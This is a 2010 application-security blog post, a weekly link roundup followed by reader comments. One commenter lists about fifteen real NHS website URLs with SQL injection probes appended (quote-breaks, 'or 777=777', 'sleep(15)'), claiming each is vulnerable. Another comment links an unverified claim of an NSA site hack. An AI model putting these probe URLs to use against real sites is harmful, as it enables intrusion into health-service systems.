Friday, February 12, 2010

Best of Application Security (Friday, Feb. 12)

Ten of Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

4 comments:

Martin Hall said...

On Number 3
(Hacker causes DOH site to close)

Maybe we need to close all of the National Health sites.

Every one I checked was Vuln.

http://www.eastmidlandsdeanery.nhs.uk/page.php?id=-1+or+777=777/
http://www.kmpt.nhs.uk/publicsurvey.php?SurveyId=%2715
http://www.londonqarc.nhs.uk/section.php?id=%271'
http://www.croydonchs.nhs.uk/list.html?srch=32txt=Health%20visiting
http://www.jpaget.nhs.uk/news.php?offset=-3
http://www.innovationssoutheast.nhs.uk/events/?event_start_month=%2711
http://www.nycris.nhs.uk/search.php?q=TheTestManager.com&f=%2715
http://www.londonqarc.nhs.uk/display_form.php?form_id=%277&section=40&blank=true
http://www.kingstonhospital.nhs.uk/kh2/kingston_page.php?pageid=75%27
http://www.shine.nhs.uk/services.php?a=2%27
http://www.bromley.nhs.uk/content.php?page=1+and+sleep(15)%23
https://www.eastern.nhs.uk/scripts/foi/informationrequestform.asp?send=no&foiid=
http://www.essafinance.nhs.uk/index/index.php?item_id=89&info_style_size=4
http://www.jpaget.nhs.uk/news.php?offset=-4
http://www.eastmidlandsdeanery.nhs.uk/page.php?id=521http://www.eastmidlandsdeanery.nhs.uk/page.php?id=521

I'm a tester by trade and all of those sites would never have made it past on any of my teams.

Poor testing if any way done at all.

If your testing websites and you only testing for functionality and not security then your not really testing at all.

Jeremiah Grossman said...

@Martin, all I can say is "damn." -- no further comment required.

Chris Schmidt said...

wow - really?

‘not sufficiently robust to withstand modern day hacking'.

I would hardly call SQLi 'modern day' since it predates the website by at least a few years.

I guess it could be considered modern day if you still consider Dial-up internet access to be bleeding edge.. :)

IT Ninja said...

btw ,the National Security Agency was recently hacked. Yes hacked! But it was downplayed to the media for obvious shameful reasons. Here’s the link :

http://pinoysecurity.blogspot.com/2010/02/wwwnsagov-hacked.html